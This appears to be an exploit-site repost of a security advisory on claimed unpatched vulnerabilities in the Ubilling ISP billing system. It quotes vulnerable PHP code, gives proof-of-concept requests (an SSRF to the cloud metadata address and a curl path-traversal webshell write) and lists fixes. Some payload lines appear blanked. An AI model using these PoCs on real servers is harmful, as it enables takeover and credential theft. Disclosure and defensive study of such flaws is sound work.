Exploit for ubilling-multi-vuln-cve

## https://sploitus.com/exploit?id=55962DC3-5E12-5EC1-9514-C1AA13633B54
# GitHub Security Advisory: Ubilling — Multiple Critical Vulnerabilities (RCE, SSRF, XXE, Path Traversal, 160+ Issues)

---

## Advisory Information

| Field | Value |
|-------|-------|
| **Severity** | Critical |
| **CWE** | CWE-94 (Code Injection) / CWE-918 (SSRF) / CWE-611 (XXE) / CWE-22 (Path Traversal) |
| **CVSS v3.1** | 9.6 (Ghost Mode Session Hijack) / 9.5 (Supply Chain eval RCE) / 9.1 (Path Traversal Arbitrary Write) / 9.0 (Unauth File Upload RCE) |
| **CVSS Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |

---

## Summary

Ubilling (1,722 PHP files, ISP billing/CMS system) contains **160+ unique vulnerabilities** — the most severe codebase audited. Findings include: (1) Remote Code Execution via supply chain `eval()` backdoor fetching from ubilling.net.ua, (2) Unauthenticated SSRF via TraffStats image proxy, (3) Path traversal to arbitrary file write/delete via template editor, (4) Unauthenticated file upload RCE via messages queue, (5) Complete absence of CSRF protection across all 1,722 files, (6) 50+ XSS vectors, (7) 3 insecure deserialization sinks, (8) 5 XXE vectors, (9) 12 auth bypass/access control issues.

---

## Vulnerability Details

### Affected Package/Repository

- **Repository:** Ubilling (ISP Billing CMS)
- **Affected Versions:** Current
- **Patched Version:** N/A (0-day)
**Commit Hash (audited):** `82cc673b2cad5dbb1f714f59b8145083e346a8a3`

---

## CVE-REQUEST-001: Supply Chain RCE via Update Server eval() Backdoor (CVSS 9.5)

**File:** `api/libs/api.workaround.php`, line 3560

```php
eval(curl_exec($curlStats));  // Fetches executable PHP from ubilling.net.ua!
```

The auto-update mechanism fetches PHP code from a remote server and passes it directly to `eval()`. This is a built-in backdoor — if the update server is compromised (or the connection is MITM'd), all Ubilling instances are compromised.

---

## CVE-REQUEST-002: Unauthenticated SSRF via TraffStats Image Proxy (CVSS 9.1)

**File:** `api/libs/api.traffstats.php`, lines 927-935

```php
$remoteImg = new OmaeUrl(base64_decode(ubRouting::get('...')));
// cURL to ANY URL — no authentication, no URL validation, follows redirects
```

No authentication required. No URL validation. No SSL verification. Follows redirects.

**PoC:**
```
GET /?module=traffstats&action=imgproxy&url=BASE64(http://169.254.169.254/latest/meta-data/)
```

---

## CVE-REQUEST-003: Path Traversal — Arbitrary File Write/Delete (CVSS 9.1)

**File:** `api/libs/api.templatize.php`, lines 496-497, 433-434

```php
// WRITE:
function zb_DocsTemplateEdit($template, $title, $body) {
    $edittemplateid = $template;  // FROM $_GET['edittemplate'] — ZERO SANITIZATION
    file_put_contents($headerspath . $edittemplateid, $title);
    file_put_contents($templatespath . $edittemplateid, $body);
}

// DELETE:
function zb_DocsDeleteTemplate($template) {
    rcms_delete_files($headerspath . $_GET['deletetemplate']);  // UNSANITIZED
}
```

**PoC:**
```bash
# Write PHP webshell
curl "http://target/?module=pl_documents&edittemplate=../../../../var/www/html/shell.php" \
  -d "edittemplatetitle=" \
  -d "edittemplatebody="
```

---

## CVE-REQUEST-004: Unauthenticated File Upload RCE (CVSS 9.0)

**File:** `api/libs/api.messagesqueue.php`, lines 715-717

```php
move_uploaded_file($_FILES['newmailattach']['tmp_name'], 
    $uploaddir . vf($_FILES['newmailattach']['name']));
```

No extension validation. `vf()` blocks `/` for path traversal but allows any file extension. Upload `.php` webshell directly.

---

## CVE-REQUEST-005: Ghost Mode Session Hijack via GET (CVSS 9.6)

**File:** `modules/general/permissions/index.php`, line 553

```php
setcookie('ubilling_user', $adminLogin . ':' . $userData['password']);
```

GET-based operation with zero CSRF protection. An attacker can hijack any admin session via a single `` tag:

```html

```

---

## CVE-REQUEST-006: No CSRF Protection — Entire Codebase (CVSS 9.6)

**File:** `api/libs/api.astral.php`, lines 34-62 — `wf_Form()` function

```php
function wf_Form($action, $method, $inputs, ...) {
    return '' . $inputs . '';  // NO CSRF TOKEN
}
```

Zero CSRF tokens in all 1,722 PHP files. Every state-changing operation is cross-origin exploitable.

---

## CVE-REQUEST-007: Insecure Deserialization (3 confirmed sinks) (CVSS 9.0)

**Sink 1** — `modules/general/userreg/index.php:55`:
```php
$newUserData = unserialize(base64_decode(ubRouting::post('repostdata')));
```

**Sink 2** — `api/libs/api.universalqinq.php:545`:
```php
$decode = unserialize(base64_decode($encode));  // POST input
```

**Sink 3** — `api/libs/api.deploy.php:168`:
```php
@$key = unserialize($key);  // XOR-obfuscated with site serial (visible on config page)
```

---

## CVE-REQUEST-008: 50+ XSS Vectors (Reflected + Stored + DOM) (CVSS 8.7)

**Root Cause:** The framework has NO centralized output escaping. `ubRouting::get()`/`post()` default to `raw` mode. The `__()` translation function does not escape. All `wf_*()` form/UI helpers (70+ functions) output raw HTML without escaping.

**Critical XSS:**
- 40+ reflected XSS via direct `echo` of `$_GET`/`$_POST`/`$_SERVER` values
- 25+ stored XSS fields (profile name, whiteboard, tickets, notes, announcements)
- 10+ DOM XSS via `innerHTML` sinks and unescaped JS context (redirects, alerts)

---

## Additional Critical Findings (160+ total):

| Category | Count | Max Severity | Key Examples |
|----------|-------|-------------|-------------|
| RCE / Command Injection | 14 | 9.5 | eval via auto-update, mass sender shell_exec, PHP console eval |
| File Upload / Path Traversal | 11 | 9.1 | Template path traversal, unauthenticated upload, vols module |
| Auth Bypass / Access Control | 12 | 9.6 | Ghost mode, payment gateway bypass, MD5 passwords |
| XSS (Reflected + Stored + DOM) | 50+ | 8.7 | No escaping framework, 70+ wf_ helpers vulnerable |
| CSRF | 1,722 files | 9.6 | Zero tokens anywhere |
| Deserialization | 3 | 9.0 | userreg, universalqinq, deploy |
| XXE | 5 | 7.5 | XLSX/ODS readers, KML parser |
| SSRF | 5+ | 9.1 | TraffStats, watchdog, SMS gateways |
| IDOR | 25+ | 9.6 | User annihilation, ghost mode, per-record checks absent |
| Information Disclosure | 7 | 7.5 | phpinfo, debug, .git, E_ALL |
| Weak Cryptography | 4 | 7.5 | MD5 unsalted, SHA1 weak, loose comparison |

---

## Impact

- **Supply chain compromise** via update server eval() backdoor
- **Complete server takeover** via 14 RCE vectors
- **Internal network access** via 5 SSRF vectors
- **File disclosure** via 5 XXE vectors
- **RCE via deserialization** in 3 POP gadget sinks
- **Admin session hijacking** via CSRF + ghost mode
- **Data exfiltration** via 50+ XSS vectors
- **Arbitrary file write** via path traversal and file upload

---

## Patches / Fix

1. **Immediate:** Remove `eval(curl_exec(...))` from auto-update — use signed JSON
2. Add authentication to TraffStats image proxy + URL validation + private IP blocking
3. Sanitize `$_GET['edittemplate']` with `basename()` in template editor
4. Add extension whitelist to ALL file upload handlers
5. Add CSRF token generation/validation to ALL forms
6. Replace `unserialize()` with `json_decode()` or add `allowed_classes => false`
7. Add `libxml_disable_entity_loader(true)` before ALL XML parsing
8. Implement centralized output escaping (auto-escape in wf_* functions)
9. Change `ubRouting::get()/post()` default from `raw` to `callback` with `htmlspecialchars`
10. Replace MD5/SHA1 with `password_hash()` + bcrypt

---

## Disclosure Timeline

- **2026-06-28:** All 160+ vulnerabilities discovered by Fatullayev Asadbek (Kimdir01)
- **TBD:** Reported to Ubilling maintainers
- **TBD:** CVEs requested (MITRE / TuranSec CNE)
- **TBD:** Advisories published

---

## Credits

- Discovered by: Fatullayev Asadbek | GitHub: Kimdir01
- Independent security researcher

---

## References

- CWE-94: Code Injection
- CWE-918: Server-Side Request Forgery
- CWE-22: Path Traversal
- CWE-434: Unrestricted File Upload
- CWE-502: Deserialization of Untrusted Data
- CWE-611: XML External Entity (XXE)
- CWE-352: Cross-Site Request Forgery